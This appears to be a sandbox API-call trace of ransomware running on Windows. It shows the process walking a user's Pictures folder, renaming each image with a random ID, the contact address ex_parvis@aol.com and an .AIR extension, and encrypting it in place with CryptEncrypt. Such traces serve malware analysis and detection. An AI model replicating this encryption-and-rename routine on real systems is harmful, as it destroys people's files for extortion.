	[0106.934] FindNextFileW (in: hFindFile=0x37b00e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e3f32c0, ftCreationTime.dwHighDateTime=0x1d4cc0b, ftLastAccessTime.dwLowDateTime=0xc38c34b0, ftLastAccessTime.dwHighDateTime=0x1d4ccf0, ftLastWriteTime.dwLowDateTime=0xc38c34b0, ftLastWriteTime.dwHighDateTime=0x1d4ccf0, nFileSizeHigh=0x0, nFileSizeLow=0x9235, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_AA0BBztgimxF2KcIFdz.png", cAlternateFileName="_AA0BB~1.PNG")) returned 0
	[0106.934] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.934] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.934] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\_AA0BBztgimxF2KcIFdz.png", dwFileAttributes=0x80) returned 1
	[0106.934] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\_AA0BBztgimxF2KcIFdz.png") returned 71
	[0106.934] GetProcessHeap () returned 0x540000
	[0106.934] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf4) returned 0x56b448
	[0106.934] lstrcpyW (in: lpString1=0x56b448, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\_AA0BBztgimxF2KcIFdz.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\_AA0BBztgimxF2KcIFdz.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\_AA0BBztgimxF2KcIFdz.png"
	[0106.934] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\_AA0BBztgimxF2KcIFdz.png", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\_AA0BBztgimxF2KcIFdz.png.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\_AA0BBztgimxF2KcIFdz.png.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.934] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\_AA0BBztgimxF2KcIFdz.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lp tyr\\_aa0bbztgimxf2kcifdz.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\_AA0BBztgimxF2KcIFdz.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lp tyr\\_aa0bbztgimxf2kcifdz.png.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.937] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\_AA0BBztgimxF2KcIFdz.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lp tyr\\_aa0bbztgimxf2kcifdz.png.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x550
	[0106.937] GetProcessHeap () returned 0x540000
	[0106.937] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0106.937] GetFileSizeEx (in: hFile=0x550, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=37429) returned 1
	[0106.937] SetFilePointer (in: hFile=0x550, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x9235
	[0106.938] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.938] GetProcessHeap () returned 0x540000
	[0106.938] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.938] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.939] WriteFile (in: hFile=0x550, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.940] WriteFile (in: hFile=0x550, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.940] WriteFile (in: hFile=0x550, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.940] ReadFile (in: hFile=0x550, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x9235, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x9235, lpOverlapped=0x0) returned 1
	[0106.942] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.942] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.942] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\M7v9lk0eRUDxEGMJWC.bmp", dwFileAttributes=0x80) returned 1
	[0106.942] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\M7v9lk0eRUDxEGMJWC.bmp") returned 69
	[0106.942] GetProcessHeap () returned 0x540000
	[0106.942] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf0) returned 0x56b448
	[0106.942] lstrcpyW (in: lpString1=0x56b448, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\M7v9lk0eRUDxEGMJWC.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\M7v9lk0eRUDxEGMJWC.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\M7v9lk0eRUDxEGMJWC.bmp"
	[0106.942] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\M7v9lk0eRUDxEGMJWC.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\M7v9lk0eRUDxEGMJWC.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\M7v9lk0eRUDxEGMJWC.bmp.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.942] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\M7v9lk0eRUDxEGMJWC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lp tyr\\m7v9lk0erudxegmjwc.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\M7v9lk0eRUDxEGMJWC.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lp tyr\\m7v9lk0erudxegmjwc.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.946] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\M7v9lk0eRUDxEGMJWC.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lp tyr\\m7v9lk0erudxegmjwc.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x550
	[0106.946] GetProcessHeap () returned 0x540000
	[0106.946] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0106.946] GetFileSizeEx (in: hFile=0x550, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=33917) returned 1
	[0106.946] SetFilePointer (in: hFile=0x550, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x847d
	[0106.946] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.946] GetProcessHeap () returned 0x540000
	[0106.946] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.946] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.946] WriteFile (in: hFile=0x550, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.947] WriteFile (in: hFile=0x550, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.947] WriteFile (in: hFile=0x550, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.947] ReadFile (in: hFile=0x550, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x847d, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x847d, lpOverlapped=0x0) returned 1
	[0106.947] SetFilePointer (in: hFile=0x550, lDistanceToMove=-33917, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.948] WriteFile (in: hFile=0x550, lpBuffer=0x37b94d0*, nNumberOfBytesToWrite=0x847d, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b94d0*, lpNumberOfBytesWritten=0x3a1f778*=0x847d, lpOverlapped=0x0) returned 1
	[0106.948] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.948] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.948] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\eAYtk.gif", dwFileAttributes=0x80) returned 1
	[0106.948] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\eAYtk.gif") returned 56
	[0106.948] GetProcessHeap () returned 0x540000
	[0106.948] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd6) returned 0x605bd0
	[0106.948] lstrcpyW (in: lpString1=0x605bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\eAYtk.gif" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\eAYtk.gif") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\eAYtk.gif"
	[0106.948] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\eAYtk.gif", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\eAYtk.gif.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\eAYtk.gif.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.948] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\eAYtk.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lp tyr\\eaytk.gif"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\eAYtk.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lp tyr\\eaytk.gif.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.951] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\eAYtk.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lp tyr\\eaytk.gif.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x550
	[0106.951] GetProcessHeap () returned 0x540000
	[0106.951] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x605bd0 | out: hHeap=0x540000) returned 1
	[0106.951] GetFileSizeEx (in: hFile=0x550, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=53356) returned 1
	[0106.951] SetFilePointer (in: hFile=0x550, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xd06c
	[0106.951] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.951] GetProcessHeap () returned 0x540000
	[0106.951] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.951] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.951] WriteFile (in: hFile=0x550, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.952] WriteFile (in: hFile=0x550, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.952] WriteFile (in: hFile=0x550, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.952] ReadFile (in: hFile=0x550, lpBuffer=0x37b1048, nNumberOfBytesToRead=0xd06c, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0xd06c, lpOverlapped=0x0) returned 1
	[0106.953] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.954] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.954] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\cwwnKrF3UVGErX2HqfG.png", dwFileAttributes=0x80) returned 1
	[0106.954] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\cwwnKrF3UVGErX2HqfG.png") returned 70
	[0106.954] GetProcessHeap () returned 0x540000
	[0106.954] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf2) returned 0x597dc8
	[0106.954] lstrcpyW (in: lpString1=0x597dc8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\cwwnKrF3UVGErX2HqfG.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\cwwnKrF3UVGErX2HqfG.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\cwwnKrF3UVGErX2HqfG.png"
	[0106.954] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\cwwnKrF3UVGErX2HqfG.png", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\cwwnKrF3UVGErX2HqfG.png.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\cwwnKrF3UVGErX2HqfG.png.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.954] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\cwwnKrF3UVGErX2HqfG.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lp tyr\\cwwnkrf3uvgerx2hqfg.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\cwwnKrF3UVGErX2HqfG.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lp tyr\\cwwnkrf3uvgerx2hqfg.png.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.956] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\cwwnKrF3UVGErX2HqfG.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lp tyr\\cwwnkrf3uvgerx2hqfg.png.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x550
	[0106.956] GetProcessHeap () returned 0x540000
	[0106.956] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x597dc8 | out: hHeap=0x540000) returned 1
	[0106.956] GetFileSizeEx (in: hFile=0x550, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=13216) returned 1
	[0106.956] SetFilePointer (in: hFile=0x550, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x33a0
	[0106.956] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.956] GetProcessHeap () returned 0x540000
	[0106.956] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.956] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.958] WriteFile (in: hFile=0x550, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.959] WriteFile (in: hFile=0x550, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.959] WriteFile (in: hFile=0x550, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.959] ReadFile (in: hFile=0x550, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x33a0, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x33a0, lpOverlapped=0x0) returned 1
	[0106.959] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.959] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.959] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\-lHIzydLVPZjPlkf1xb.png", dwFileAttributes=0x80) returned 1
	[0106.959] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\-lHIzydLVPZjPlkf1xb.png") returned 70
	[0106.959] GetProcessHeap () returned 0x540000
	[0106.960] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf2) returned 0x597dc8
	[0106.960] lstrcpyW (in: lpString1=0x597dc8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\-lHIzydLVPZjPlkf1xb.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\-lHIzydLVPZjPlkf1xb.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\-lHIzydLVPZjPlkf1xb.png"
	[0106.960] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\-lHIzydLVPZjPlkf1xb.png", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\-lHIzydLVPZjPlkf1xb.png.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\-lHIzydLVPZjPlkf1xb.png.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.960] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\-lHIzydLVPZjPlkf1xb.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lp tyr\\-lhizydlvpzjplkf1xb.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\-lHIzydLVPZjPlkf1xb.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lp tyr\\-lhizydlvpzjplkf1xb.png.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0107.031] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\-lHIzydLVPZjPlkf1xb.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lp tyr\\-lhizydlvpzjplkf1xb.png.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x550
	[0107.031] GetProcessHeap () returned 0x540000
	[0107.031] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x597dc8 | out: hHeap=0x540000) returned 1
	[0107.031] GetFileSizeEx (in: hFile=0x550, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=30550) returned 1
	[0107.031] SetFilePointer (in: hFile=0x550, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x7756
	[0107.031] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0107.031] GetProcessHeap () returned 0x540000
	[0107.031] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0107.031] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0107.031] WriteFile (in: hFile=0x550, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0107.035] WriteFile (in: hFile=0x550, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0107.035] WriteFile (in: hFile=0x550, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0107.035] ReadFile (in: hFile=0x550, lpBuffer=0x37b1048, nNumberOfBytesToRead=0x7756, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x37b1048*, lpNumberOfBytesRead=0x3a1f778*=0x7756, lpOverlapped=0x0) returned 1
	[0107.036] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63599b0, ftCreationTime.dwHighDateTime=0x1d4c872, ftLastAccessTime.dwLowDateTime=0xe65b85f0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe65b85f0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x37b0120
